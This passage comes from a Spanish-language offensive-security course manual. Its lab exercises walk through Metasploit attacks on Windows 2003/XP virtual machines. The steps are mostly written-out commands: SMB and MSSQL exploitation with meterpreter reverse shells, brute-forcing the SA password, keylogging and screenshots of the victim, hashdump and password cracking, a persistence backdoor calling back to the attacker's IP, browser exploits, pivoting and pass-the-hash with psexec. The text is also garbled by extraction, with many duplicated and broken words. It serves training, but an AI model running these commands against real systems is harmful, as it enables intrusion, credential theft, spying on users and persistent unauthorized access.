conocimientos básicos-medios al respecto de los te medios servicios de red que se están evaluando y próximamente atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado. Ejecución de la práctica de laboratorio 3: Paso 1: Trabajando con el Protocolo SMB: Realizar un proceso de scanning del servicio SMB (Server Message Block Scanning), para lo cual se debe de seleccionar el modulo auxiliar auxiliary/scanner/smb/smb_version Para poder usar este modulo, se debe realizar de forma auxiliary/scanner/smb/smb_version. o, secuencial lo siguiente: © www.dsteamseguridad.com
  • 20. Certified Offensive and Defensive Security Professional -CODSP Training seleccionar el modulo auxiliar con el comando use auxiliary/scanner/smb/smb_version Luego se debe de digitar el comando show options, para ver las opciones del modulo , auxiliar Luego se le coloca la variable RHOSTS, que para el caso de este laboratorio, seria para variable asignar la dirección IP de Windows 2003 Server. De nuevo digitamos show options y si todo está bien, ejecutamos el módulos auxiliar con el comando exploit. En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados anteriormente. Si el exploit se ejecuta correctamente, deberá de mostrar algo similar a la siguiente imagen, donde se puede apreciar el sistema operativo del target (Victima -objetivo de análisis de seguridad), el dominio al que está asociado la víctima, y el nombre del d), , servidor © www.dsteamseguridad.com
  • 21. Certified Offensive and Defensive Security Professional -CODSP Training Paso 2: Trabajando con el Protocolo SMB: Realizar un proceso de enumeración de usuarios y grupos del nuestra víctima o target, que para el caso es Windows 2003 Serve lo cual se logra Server, usando el modulo auxiliar auxiliary/scanner/smb/smb_lookupsid auxiliary/scanner/smb/smb_lookupsid. Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente: use auxiliary/scanner/smb/smb_lookupsid show options set RHOSTS IP Windows Server exploit En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados nte anteriormente. Si el modulo auxiliar se ejecuta de forma correcta, deberemos tener los nombres de usuarios y grupos que existen actualmente en el servidor Windows 2003 Server. © www.dsteamseguridad.com
  • 22. Certified Offensive and Defensive Security Professional -CODSP Training Paso 3: Trabajando con el Protocolo SSH: Realizar un proceso de identificación de la versión del servidor SSH que se encuentra en el equipo Windows XP SP2 Lo anterior se logra SP2. seleccionando el modulo auxiliar de metasploit llamado auxiliary/scanner/ssh/ssh auxiliary/scanner/ssh/ssh_version Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente: use auxiliary/scanner/ssh/ssh_version show options set RHOSTS IP Windows XP SP2 exploit En la siguiente imagen encuentras de forma secuencial todos los pasos mencio mencionados anteriormente. Paso 4: Trabajando con el Protocolo SNMP: Realizar un proceso de identificación de recursos que se tengan compartidos en la estación de trabajo Windows XP SP2, usando el protocolo simple de administración de red. Lo anterior se logra seleccionando el modulo auxiliar de logra metasploit llamado use auxiliary/scanner/snmp/snmp_enumshares use auxiliary/scanner/snmp/snmp_enumshares show options set RHOSTS 192.168.137.28 run © www.dsteamseguridad.com
  • 23. Certified Offensive and Defensive Security Professional -CODSP Training En la siguiente imagen encuentras de forma secuencial todos los pasos mencionados anteriormente. Anotación: Y de forma similar existen muchísimos más módulos auxiliares a nivel de scanners de puertos y aplicaciones, los cuales evalúan otros protocolos tales como FTP, MSSQL, SNMP, entre otros. Práctica de laboratorio numero 4 Objetivos: Identificar y utilizar algunos de los módulos auxiliares que tiene Metasploit para : realizar procesos de análisis de vulnerabilidades para aplicaciones y/o protocolos específicos, tanto a nivel TCP como para U UDP. Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP y Backtrack 5 Observaciones: Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping de entre ambas maquinas. Es altamente importante tener conocimientos básicos medios al respecto de los básicos-medios © www.dsteamseguridad.com
  • 24. Certified Offensive and Defensive Security Professional -CODSP Training servicios de red que se están evaluando y próximamente atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado. penetration Como actividad complementaria y para evitar todo el tiempo que la aplicación nessus se demora actualizando los plug in, se puede usar el software nessus que esta plug-in, instalado en la maquina Windows XP Anotación: Es altamente recomendable que si el estudiante no conoce como trabaja MSSQL recomendable Server, lo investigue por cuenta propia con el fin de mejorar los conocimientos relacionados con auditorias de sistemas intrusivas del tipo Penetration Testing, ya que durante la siguiente practica de laboratorio, va a comprometer a SQL Server, en lo que respecta a violentar la seguridad del motor de bases de datos, y del sistema operativo que lo contiene.. Ejecución de la práctica de laboratorio 4: Paso 1: Scanning de Puertos y version del puerto T 1433: Si se tiene en cuenta los procesos TCP de scanning de puertos realizados en laboratorios pasados, se puede observar que el puerto 1433 TCP está en estado Listening (Abierto), esperando conexiones, además si se realiza un tado proceso de scanning de puertos a este puerto en especial con la opción -sV de nmap, se puede sV apreciar que el servicio y versión que están detrás de ese puerto, son Microsoft SQl Server 2005 SP1. Proceder a realizar el scanning de puertos, según los comandos de la siguiente imagen. Paso 2: Identificación de vulnerabilidades servicios MSSQL: El siguiente paso es realizar un proceso de identificación de vulnerabilidades, para el caso vamos a buscar vulnerabilidades en vulnerabilidades, el login y password del usuario SA (System Administrator) del sistema de bases de datos MS a MS- SQL SERVER. Para lograr identificar vulnerabilidades en cuanto a credenciales de acceso débiles, podemos usar el siguient , siguiente modulo auxiliar de metasploit llamado auxiliary/scanner/mssql/mssql_login. auxiliary/scanner/mssql/mssql_login Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente: debe use auxiliary/scanner/mssql/mssql_login show options set PASS_FILE /pentest/passwords/john/password.lst set RHOSTS 192.168.137.28 (Aquí colocas la dirección IP de Servidor Windows) set VERBOSE false show options exploit © www.dsteamseguridad.com
  • 25. Certified Offensive and Defensive Security Professional -CODSP Training Como se puede apreciar en las anteriores imágenes, en modulo auxiliar mssql_login logro mssql_login, identificar una contraseña débil para el usuario SA (System Administrator), que para el caso, la contraseña de acceso para el usuario SA es password Ir más allá: Para complementar este ejercicio, insertar realizar un análisis de vulnerabili vulnerabilidades usando el Software NESSUS, revisar en los reportes de este software, que se identifican otro tipo de vulnerabilidades criticas que pueden ser explotadas usando Metasploit Framework. Paso 2: Identificación de vulnerabilidades servicios HTTP: Con herramientas diversas que pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de análisis de vulnerabilidades. Vamos a utilizar el software NETCAT para realizar un simple © www.dsteamseguridad.com
  • 26. Certified Offensive and Defensive Security Professional -CODSP Training análisis de vulnerabilidades basado en la huella de identificación de una aplicación. Para poder usar netcat lanzamos el siguiente comando: nc 192.168.137.28 80 (Colocar la dirección IP de su sistema Windows Server) Lugo ejecutamos el siguiente comando comando: HEAD / HTTP/1.0 Luego damos sobre enter, y debe de salir un mensaje similar al siguiente: En la anterior imagen se puede observar perfectamente que el servidor web del equipo Windows 2003 Server, es IIS 6.0, software que tiene muchísimas vulnerabilidades conocidas y S códigos de explotación para aprovecharse de dichas vulnerabilidades. Paso 3: Identificación de vulnerabilidades servicios SMB: Con herramientas diversas que pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de análisis de vulnerabilidades. Vamos a utilizar el software NMAP acompañado de uno de los script que existen para este software, con el fin de identificar vulnerabilidades ara el servicio SMB, puerto 445 TCP. Para poder usar nmap de la forma que lo necesitamos, lanzamos el siguiente comando: nmap --script smb-check-vulns.nse -p445 192.168.137.28 (Recordar cambiar la direccion IP vulns.nse de su Windows Server) © www.dsteamseguridad.com
  • 27. Certified Offensive and Defensive Security Professional -CODSP Training En la anterior imagen se puede observar los resultados del comando ejecutado, donde se puede observar que se identifico una vulnerabilidad en el puerto 445 TCP. Práctica de laboratorio númer 5 "Explotación Básica" número Objetivos: Aprovecharse de las vulnerabilidades encontradas en los pasos y servic : servicios anteriores, con la configuración y ejecución de Exploits y PAYLOADS del tipos Server Side Recursos: VMWARE, Metasploit Framework, Windows Server 2003 y Backtrack 5 Observaciones: Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos medios al respecto de los básicos-medios servicios de red que se están atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado. Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando estudiando con la ejecución de exploits dentro de metasploit. La vulnerabilidad MS 08 08-07, aun puede verse en algunos equipos, pero en casos muy n concretos y especiales tales como equipos XP-Server 2003 recién formateados, no especiales, parchados, sin el firewall activo. Esta explotación no puede hacerse desde la WAN, , porque los routers de los ISP bloquean el trafico para puertos como el 445,139, etc. El EXPLOIT ms08-07 es altamente utilizado en las academias para cursos básicos y 07 avanzados de hacking, para poder enseñar todas las funcionalidades de metasploit. e Ejecución de la práctica de laboratorio 5 5: © www.dsteamseguridad.com
  • 28. Certified Offensive and Defensive Security Professional -CODSP Training Paso 1: Explotación de vulnerabilidades servicios SMB: Una vez identificada las ción vulnerabilidades en diversos servicios de red, procedemos a realizar la respectiva explotación de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad identificada con NMAP y con NESSUS descrita como MS08 67, debemos realizar lo siguiente: entificada MS08-67, (Para el siguiente ejercicio de explotación, tener presente el siguiente esquema: Ingresar a metasploit abriendo la interface msfconsole metasploit, lanzar el comando search ne netapi Seleccionamos el Exploit exploit/windows/smb/ms08_067_netapi, y lo asignamos con exploit/windows/smb/ms08_067_netapi, el comando use windows/smb/ms08_067_netapi Luego se debe de indicar en la Shell de METASPLOIT la opción show options para options, verificar las opciones del tipo variable que se requiere en este exploit, para poder s explotar la vulnerabilidad. El resultado del comando, debe de ser similar al de la siguiente imagen: Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver resultados NMAP Anteriores), correspondiente al servicios CIFS/SMB, además que se Anteriores), necesita la dirección IP del equipo victima asignada. Para asignar la dirección IP de la víctima , debemos de ejecutar el siguiente comando: set RHOST Dirección IP Victima (192.168.119.225 por Ejemplo). © www.dsteamseguridad.com
  • 29. Certified Offensive and Defensive Security Professional -CODSP Training Luego se debe de ingresar de nuevo el comando show options para verificar que en efecto el valor de la dirección IP de la víctima fue asignado a la variables RHOST. El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con est este Exploit, para lo cual daremos el siguiente comando: show payloads Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio, y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente payload: windows/meterpreter/reverse_tcp terpreter/reverse_tcp Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente comando: set PAYLOAD windows/meterpreter/reverse_tcp Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado. Luego debemos de dar e comando show options, para ver las opciones que se el , necesita asignar al PAYLOAD elegido. El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP del equipo Linux Backtrack) Para poder asignar el valor de la IP de Backtrack a la variables LHOST, se debe de ejecutar el siguiente comando: set LHOST Dirección IP Backtrack (Maquina Atacante) Se vuelve a ingresar el comando show options, para ver que en efecto la variable er LHOST quedo con la dirección IP de Backtrack Asignada. Luego ingresamos el comando show targets, para verificar todos los sistemas , Windows que pueden ser explotados por este Exploit. Si hasta aquí todo va bien, no queda más que lanzar el ataque a la maquina victima que (Maquina Con Windows XP Y/O Server 2003 ya que ambas estan vulnerables Para vulnerables). lanzar el ataque, solo se debe de ingresar el siguiente comando: exploit Luego de que el exploit, se ejecuta el PAYLOAD que hemos elegido, dejándonos en la Shell de meterpreter de METASPLOIT. Tal y como se puede observar en la siguiente imagen: © www.dsteamseguridad.com
  • 30. Certified Offensive and Defensive Security Professional -CODSP Training Meterpreter tiene muchas opciones, pero para el caso, vamos a usar la opción que me permite obtener una shell en el equipo víctima, lo cual podemos lograr ingresando el siguiente comando en la consola de meterpreter: shell Nota: Antes de lanzar el comando shell, entrar al equipo víctima, como usuario final, y verificar por el administrador de tareas cuantos CMD.exe hay ejecutándose, luego hacer los mismo, pero después de lanzado el comando shell. cer Luego de ejecutado el comando shell, el sistema debe de abrir la shell de Windows XP y/o Server 2003 de la maquina victima (cmd--shell), justo como se shell), muestra en la siguiente imagen. Anotación: si se presenta algún problema con la ejecución de la shell, digita desde la consola otación: meterpreter el comando getsystem, para escalar privilegios en el sistema atacado. getsystem, El siguiente paso es crear algunas carpetas en la raíz del disco C: del equipo víctima, usando el comando mkdir. Luego se debe de ingresar al equipo víctima, como si fuéramos un usuario normal del equipo, y verificar que en efecto se han creado las carpetas. (Recordar crear la carpeta dentro del disco C, y no dentro de system32, para efectos de facilidad en la visualización del directorio creado) Paso 2: Explotación de vulnerabilidades servicios MSSQL Server: En este segundo paso de explotación del lado server side, vamos a aprovecharnos de la vulnerabilidad identificada con side, la clave débil del usuario SA (System Administrator de SQL Server), la cual es password. e Además que vamos a ir avanzando en los procesos de post explotación utilizando las post-explotación diferentes herramientas que nos ofrece meterpreter. Para explotar la vulnerabilidad en men mención, debemos de hacer lo siguiente: (Para el siguiente ejercicio de explotación, tener presente el siguiente esquema) © www.dsteamseguridad.com
  • 31. Certified Offensive and Defensive Security Professional -CODSP Training realizar desde msfconsole una búsqueda con el comando search mssql Luego en los resultados que nos aparece en pantalla, seleccionar el exploit windows/mssql/mssql_payload Asignar al metasploit el uso del exploit en mención con el comando: use windows/mssql/mssql_payload Luego vamos a buscar los PAYLOADS disponibles para este exploit con el comando show payloads Seleccionamos el PAYLOAD windows/meterpreter/reverse_tcp Luego vamos a dar el comando show options para poder ver las opciones que nos pide el Exploit y el Payload seleccionado. Las variables a asignar son: PASSWORD --> aquí ponemos la clave vulnerable, la cual es password > RHOST--> aquí colocamos la IP de la victima LHOST--> aquí colocamos la IP del atacante Todas los valores a las anteriores variables, se asignan con el comando set finalmente cuando todas las variables están asignadas, se ejecuta el comando exploit © www.dsteamseguridad.com
  • 32. Certified Offensive and Defensive Security Professional -CODSP Training Jugando con Meterpreter: Teniendo presente que meterpreter tiene muchas funcionalidades, salimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter, comenzamos a usar varios comandos. Una vez desde meterpreter, lanzar los siguientes comandos: Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr con el comando ps desde las shell de meterpreter. ps, Posteriormente debemos de identificar con que proceso nos pudimos colar en el sistema victima Windows 2003 Server. Lo cual podemos identificar ejecutando el Server. comando: getpid, desde las shell de meterpreter. Luego ejecutamos de nuevo el comando ps e identificamos el nombre del proceso con que ingresamos al sistema víctima. El siguiente paso es colocar en funcionamient un Keylogger en el equipo víctima, funcionamiento para poder registrar las pulsaciones del teclado. Para lograr que el Keylogger funcione de manera adecuada, se debe de hacer lo r siguiente: Abrir en el equipo server 2003 el aplicativo notepad. Volver al equipo atacante Backtrack y ejecutar de nuevo el comando ps, para poder identificar con que ID esta el notepad ejecutándose. Una vez que se identifique el ID del notepad, debemos de realizar un proceso de migración del proceso con el cual hemos comprometido el sistema ví víctima, al proceso que ejecuta el notepad en el mismo equipo víctima. Lo anterior lo logramos con la ejecución del comando migrate seguido del migrate, ID identificado del proceso notepad. Si sale algún mensaje de error por cuestiones de permisos, entonces debemos de ejecutar el comando getsystem, para poder escalar privilegios , en la maquina víctima. Luego ejecutar de nuevo el comando migrate, . seguido del respectivo ID, y ya debe de realizar una migración exitosa. , El siguiente paso es poner el keylogger en funcionamiento, con el siguiente funcionamiento, comando: run keylogrecorder Esperar unos segundos, y comenzar a escribir en el notepad de la víctima. Luego darle control+c para detener el keylogger Finalmente usar el comando cat desde una Shell nueva de Linux, para visualizar las capturas de teclas, en la ruta indicada por el registro del keylogger Anotación: Recordar lanzar el comando cat desde una consola (Teminal) de comandos diferente a la de metasploit tal y como se muestra en la siguiente imagen. © www.dsteamseguridad.com
  • 33. Certified Offensive and Defensive Security Professional -CODSP Training Entre otras de las opci opciones de meterpreter, también se puede registrar capturas de pantalla de la víctima con el comando screenshot, lo cual se puede lograr con , los siguientes pasos: Ingresar al equipo víctima, y abrir el notepad y colocar lo siguiente: , Hola, mi número de tarjeta de crédito es: 12376666 y la clave es 123333 eta Una vez que escribamos eso, regresamos a la shell de meterprter (resultado en pasos anteriores de esta práctica) en Backtrack y ejecutamos el siguiente comando: screenshot De inmediato debe de salir en Backtrack, una copia de pantalla de la Backtrack, víctima, con lo cual el atacante podrá obtener información valiosa, y podrá espiar a la víctima. Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los usuarios creados en el sistema víctima, lo cua podemos hacer con el comando hashdump desde la consola cual meterpreter Luego debemos de colocar estos hash en un archivo de texto para luego proceder a realizar un estos proceso de crack de password. Podemos copiar y pegar los hashes en la ruta /pentest/passwords/john. Una vez allí usamos el editor nano para guardar el archivo, y luego . procedemos a ejecutar el software crackead de password john the ripper, lo cual po crackeador podemos realizar con el siguiente comando ./john hashwin comando: © www.dsteamseguridad.com
  • 34. Certified Offensive and Defensive Security Professional -CODSP Training Como se puede apreciar en la ima imagen, el passwords de Windows Server fue crackeado. s Anotación: Los hash obtenidos también se pueden copiar y pegar en el siguiente sitio web y allí también pueden ser crackeados http://www.md5decrypter.co.uk crackeados. Sin embargo lo anterior puede ejecutarse de una mejor forma, y más fácil usando de metasploit, para los cual nos vam a ayudar de dos módulos auxiliares llamados: vamos es auxiliary/analyze/jtr_crack_fast post/windows/gather/credentials/credential_collector © www.dsteamseguridad.com
  • 35. Certified Offensive and Defensive Security Professional -CODSP Training Para poder ejecutar estos dos módulos de forma paralela, se debe de continuar , ejecutando los siguientes pasos: desde msfconsole seleccionar el módulo auxiliar: post/windows/gather/credentials/credential_collector El anterior modulo se carga en metaspl con el siguiente comando: metasploit use post/windows/gathe post/windows/gather/credentials/credential_collector. Luego se da el comando show options y se observa que se le debe de indicar alguna de las sesiones que se tengan activas en el moento, que para el caso deberíamos de tener dos, una sesión para la explotación d MSSQL y otra la explotación SMB. indicar la sesión activa con el siguiente comando: set SESSION 1 Luego se ejecuta el modulo auxiliar con el comando run Como se puede observar en el siguiente resultado del comando, se obtienen todos los hash de los usuarios de Windo Windows. Luego se ejecuta el modulo auxiliar de metasploit auxiliary/analyze/jtr_crack_fast el /analyze/jtr_crack_fast, cual nos sirve para hacerle crack a todos los passwords de los usuarios del sistema víctima, que para el caso es Windows Server. Por último ejecutamos el módulo auxiliar con el comando run. © www.dsteamseguridad.com
  • 36. Certified Offensive and Defensive Security Professional -CODSP Training Finalmente observamos que el módulos nos obtuvo todas las contraseñas (Darle paciencia para obtener las contraseñas, ya que se demora un poco) Práctica de laboratorio númer 6 "Mas Meterpreter" número Objetivos: Conocer y utilizar más funcionalidades de meterpreter a nivel de explotación y e post- explotacion. Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP SP2 y 2003, Backtrack 5 Observaciones: Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y las Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos medios al respecto de los básicos-medios servicios de red que se están atacando, para comprender mejor el trabajo de análisis comprender de seguridad y/o penetration testing realizado. Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando con la ejecución de exploits dentro de metasploit, y con la consola meterpreter e Ejecución de la práctica de laboratorio 6 6: Paso 1: Colocar una puerta trasera con meterpreter como servicio: Teniendo presente que meterpreter nos permite hacer muchísimas tareas de explotación y post explotación en la post-explotación maquina víctima, vamos a proceder a dejar a meterpreter como una puerta trasera en la dejar maquina víctima, para que nos permita conectarnos a la victima cada que necesitemos hacerlo, y no dependa la explotación directamente de una vulnerabilidad conocida, ya que esta puede ser solventada por el admi administrador de red. Para lograr esta tarea, se debe de hacer lo siguiente: Estar en una consola meterpreter, la cual se lora con la explotación de alguna vulnerabilidad conocida en la victima. © www.dsteamseguridad.com
  • 37. Certified Offensive and Defensive Security Professional -CODSP Training Ejecutar el siguiente comando para colocar meterpreter como un servicios en la máquina victima, los cual se logra ejecutando el siguiente comando: run metsvc –A Luego debemos de ejecutar el exploit multi/handler, lo cual se logra ejecutando el , siguiente comando: use exploit/multi/handler Posteriormente selecciona el siguiente PAYLOAD windows/metsvc_bind_tcp Para asignar este PAYLOAD al exploit, se ejecuta el siguiente comando: set PAYLOAD windows/metsvc_bind_tcp. windows/metsvc_bind_tcp Luego se le asignan las variables al exploit, que para el caso son RHOST y el puerto en el cual quedo a la escucha el servicio de meterpreter Luego se ejecuta el exploit Paso 2: Colocar una puerta trasera con meterpreter como servicio persistente persistente: Teniendo presente que meterpreter nos permite hacer muchísimas tareas de explotación y post-explotación en la maquina víctima, vamos a proceder a dejar un explotación maquina servicios persistente que este llamando al atacante por un puerto determ determinado, y cada tiempo determinado, lo cual se logra realizando lo siguiente: ejecutar el siguiente comando: run persistence -A -S -U -i 60 -p 4321 –r U 192.168.56.101 (Recordar que aquí se coloca la IP de Backtrack, que será diferente para cada estudiante) (Lo que hace el comando anterior, es básicamente lo siguiente Con la opción - Lo siguiente: A se coloca una conexión a la escucha en la maquina del atacant la opción -S atacante, garantiza que la puerta trasera que colocamos se inicie cada vez que la maquina victima Windows arranque. Con la opción -i se asigna un intervalo de tiempo para la conexión de la victima hacia el atacante, con la opción -p , asignamos un puer en la maquina del atacante, y la opción -r indica la puerto , dirección IP el atacante donde esta una conexión a la escucha) © www.dsteamseguridad.com
  • 38. Certified Offensive and Defensive Security Professional -CODSP Training Práctica de laboratorio número 7 "Explotación Básica" del lado del cliente número Objetivos: Aprender cómo trabajan y se ejecutan los procesos de explotación del lado del procesos cliente (Client Sie) Recursos: VMWARE, Metasploit Framework, Windows XP SP2 y Backtrack 5 tasploit Observaciones: Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos medios al respecto de los básicos-medios servicios de red que se están atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado. Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando con la ejecución de exploits dentro de metasploit, y con la consola meterpreter Ejecución de la práctica de laboratorio 7 7: Paso 1: Explotación de Internet Explorer (Aurora): Comenzando con los procesos de tación explotación del lado del cliente, vamos a usar un exploit que se aprovecha de una vulnerabilidad conocida en Internet explorer, conocida como operacion aurora Para ejecutar da aurora. este exploit, debemos de realiza lo siguiente: Seleccionar el exploit exploit/windows/browser/ms10_002_aurora Asignarlo a la consola con el comando: use exploit/windows/browser/ms10_002_aurora seleccionar un PAYLOAD, para el caso vamos a usar set payload windows/meterpreter/reverse_tcp erpreter/reverse_tcp set URIPATH / set LHOST 192.168.33.129 set LPORT 443 exploit © www.dsteamseguridad.com
  • 39. Certified Offensive and Defensive Security Professional -CODSP Training Paso 2: Explotación de navegadores con el modulo Browser autopwn Continuando con los autopwn: ntinuando procesos de explotación del lado, ahora vamos a configurar el exploit llamado use rocesos lado, auxiliary/server/browser_autopwn el cual se aprovecha de vulnerabilidades conocidas de liary/server/browser_autopwn, varios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente: Seleccionar el exploit auxiliary/server/browser_autopwn Asignar este exploit con el coman comando use Para asignar este exploit, debemos de ejecutar el siguiente comando: use exploit auxiliary/server/browser_autopwn Luego se debe de asignar la variable LHOST y la variable URIPATH. Finalmente se le da el comando exploit, y se le envía a la victima la URL del servidor web que acaba de cargar metasploit. Anotación: hay que darle un poco de paciencia a la ejecución de este exploit ya que lanza varios códigos de explotación y al final nos muestra las sesiones que logro abrir en la máquina víctima. Práctica de laboratorio númer 8 "Pivoting" número Objetivos: Aprender cómo se realiza el proceso de pivoting entre dos subrede proceso Recursos: VMWARE, Metasploit Framework, Windows ServerWindows XP SP2 y Backtrack 5 tasploit Windows Observaciones: © www.dsteamseguridad.com
  • 40. Certified Offensive and Defensive Security Professional -CODSP Training Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Esta práctica debe de hacerse desde dos maquinas físicas, 4 maquinas virtuales Anotación general de la práctica 8: al Para la siguiente practica, se debe de tener presente el siguiente escenario: Nota: Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas de red en el servidor Windows 2003, cada una de ellas debe de esta configurada con diferentes subredes (Segmentos de red). La que está conectada al segmento de red que está en bridge, esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjeta podemos asignarle una dirección IP como la 10.0.0.1 mascara 255.255.255.0. Tener presente primero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otra que se va a crear, se renombra como LAN LAN. Es altamente importante ensayar que el si se presente ping entre los diferen diferentes segmentos de red antes de comenzar la práctica. Pasos para ejecutar la práctica: Los pasos que se deben de realizar paso para poder lograr el proceso de pivoting en la maquina victima (Windows XP Victima final) es el siguiente: 1) Lo primero es configurar las tarjetas de red para el laboratorio, las cuales se configuran de la igurar siguiente manera: © www.dsteamseguridad.com
  • 41. Certified Offensive and Defensive Security Professional -CODSP Training Windows Server: debe de tener dos tarjetas de red una conectada en modo bridge, y la segunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar en la siguiente imagen. Recordar que la que está en bridge, obtiene DHCP por medio de la red LAN, y la que está en VMNET2 se le configura manualmente una 10.0.0.1/24. Luego se configura la maquina Windows XP y la tarjeta de red también la colocamos co como VMNET2, y asignamos otra Dirección IP del mismo rango que en Windows server, la cual puede ser 10.0.0.11/24. Tener presente colocarle en la configuración de la tarjeta de red de Windows XP como servidor DNS y puerta de enlace la dirección IP de Windows Server. 2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP al dominio que se encuentra en Windows Server 2003. 3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modo Bridge. Lo anterior se hace desde Linux BT5. Recordar que BT5 debe de estar configurado or también en modo Bridge, y por el segmento de red de Windows Server. Se recomienda usar un exploit al cual sea vulnerable, y en el PAYLOAD usar Windows Meterpreter Reverse TCP. 4) El cuarto paso es averiguar cuantas tarjetas de red tiene el equipo víctima, y la configuración uarto de estas. Si todo va hasta aquí bien, se deben de identificar 2 tarjetas de red red. Adicionalmente desde meterpreter se puede lanzar el comando run arp_scanner –r 10.0.0.0/24. Con el anterior comando se puede identificar otros host conectados al segmento de red alterno del servidor 2003. 5) Salir de meterpreter con el comando background para proceder a agregar una ruta a nuestra maquina, lo cual hacemos con el siguie siguiente comando: route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesión que se abrió con Meterpreter) Luego damos el comando route print para ver la ruta. © www.dsteamseguridad.com
  • 42. Certified Offensive and Defensive Security Professional -CODSP Training Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes comandos: run autorun –h y luego run autoroute –s 10.0.0.0/24 s O también puede usarse el modulo auxiliar llamado post/windows/manage/autoroute post/windows/manage/autoroute. Este nos va a solicitar la sesión abierta y la subred a la cual queremos enrutarnos 6) Una vez que se tiene la ruta, el siguiente paso es sacar los Hash de los usuarios del dominio a llamado METASPLOIT. Lo anterior ya se vio en prácticas de laboratorio pasadas. o 7) El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso del modulo auxiliar de Metasploit llamado auxiliary/scanner/portscan/tcp. Este módulo nos pide llamado: . los puertos, que para el caso vamos a darle 80,135,139,445, y nos pide la víctima que para el víctima, caso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15. Luego le damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente a Windows XP, con todos sus respectivos puertos abiertos. Lanzar exploit: 8) Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra el equipo Windows XP, pero esta vez se debe de ejecutar el PAYLOAD meterpreter/bind_tcp Optativo: Lanzar otro exploit: 9) También podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con el PAYLOAD llamado: exploit/windows/smb/psexec Cuando seleccionemos este PAYLOAD, se le exploit/windows/smb/psexec. ccionemos deben de asignar las siguientes variables (Tener presente que para este exploit se requiere de los hash que obtuvieron en pasos anteriores de esta práctica). RHOST: 10.0.0.11 SMBUser administrator SMBPass se le coloca el hash obtenido en puntos anteriores de esta práctica (Ojo copiar y Pegar el HASH, en lo que respecta al contenido que esta antes de :::) SMBDomain (Colocar el nombre del dominio, el cual debe de ser METASPLOIT) Y por último el PAYLOAD, el cual es Meterpreter/bi Meterpreter/bind_tcp. Finalmente se ejecuta con el comando run © www.dsteamseguridad.com